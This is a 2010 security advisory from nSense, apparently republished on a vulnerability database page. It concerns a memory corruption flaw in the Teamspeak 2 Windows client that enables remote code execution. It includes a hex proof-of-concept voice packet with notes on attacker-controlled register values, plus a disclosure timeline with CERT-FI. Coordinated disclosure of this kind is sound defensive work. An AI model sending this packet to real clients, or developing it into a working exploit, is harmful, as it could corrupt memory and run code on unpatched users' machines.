Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25023
HistoryNov 01, 2010 - 12:00 a.m.

nSense-2010-002: Teamspeak 2 Windows client

2010-11-0100:00:00
vulners.com
7
JSON
   nSense Vulnerability Research Security Advisory NSENSE-2010-002
   ---------------------------------------------------------------
               t2'10 infosec conference special release
                           http://www.t2.fi
   ---------------------------------------------------------------

   Affected Vendor:    Teamspeak Systems GmbH
   Affected Product:   Teamspeak 2 version 2.0.32.60
   Platform:           Windows
   Impact:             Remote code execution
   Vendor response:    No patch. Upgrade to TS3
   Credit:             Jokaim / nSense

   Technical details
   ---------------------------------------------------------------

   The specific flaw exists within the TeamSpeak.exe module
   teardown procedure responsible for freeing dynamically
   allocated application handles.

   It is possible to corrupt this memory area by transmitting a
   voice transmission packet (0xf2) to the server. All clients
   receiving the voice transmission will have their memory
   corrupted. The resulting memory corruption leads to a overflow
   of values which are later used in a copy operation
   (during teardown).

   This can be leveraged to achieve remote code execution
   within the context of the user running the application.

   The following packet is provided as a Proof-of-Concept example:
   f2be000426ad7e00300000000001000a414141414141414141424141414141
   4141414141414141414141414141414141414100ff99414141424242424141
   414141414141414141

   Bytes 51 and onwards contain user controllable values for EAX
   and EDX. A weaponized exploit has been developed but will not
   be released to the public. See memory location 00401C72.

   Timeline:
   Jul 20th        Contacted CERT-FI vulncoord
   Jul 22nd        CERT-FI vulcoord responds,coordination started
   Aug 9th         Status update request sent to CERT-FI
   Aug 20th        CERT-FI informs that the vendor had suggested
                   posting the issue to their plic support
                   forum. Coordination continued.
   Aug 26th        Status update request sent to CERT-FI
   Aug 26th        CERT-FI responds
   Sep 23rd        Weaponized exploit ready and polished.
                   Information sent to CERT-FI
   Sep 28th        CERT-FI informs that vendor is not supporting
                   TS2, since 's a legacy version. Users are
                   instructed to upgrade to TS3.
   Oct 28th        Advisory published.

   A thank you to CERT-FI vulncoord for the coordination effort.


   http://www.nsense.fi                       http://www.nsense.dk



   $$s$$$$s.   ,s$$$$s   ,S$$$$$s.  $$s$$$$s.   ,s$$$$s   ,S$$$$$s.
   $$$  `$$$  ($$(       $$$  `$$$  $$$  `$$$  ($$(       $$$  `$$$
   $$$   $$$    `^$$s.   $$$$$$$$$  $$$   $$$    `^$$s.   $$$$$$$$$
   $$$   $$$       )$$)  $$$        $$$   $$$       )$$)  $$$
   $$$   $$$  ^$$$$$$7    `7$$$$$P  $$$   $$$  ^$$$$$$7   `7$$$$$P

                  D r i v e n   b y   t h e   c h a l l e n g e _
JSON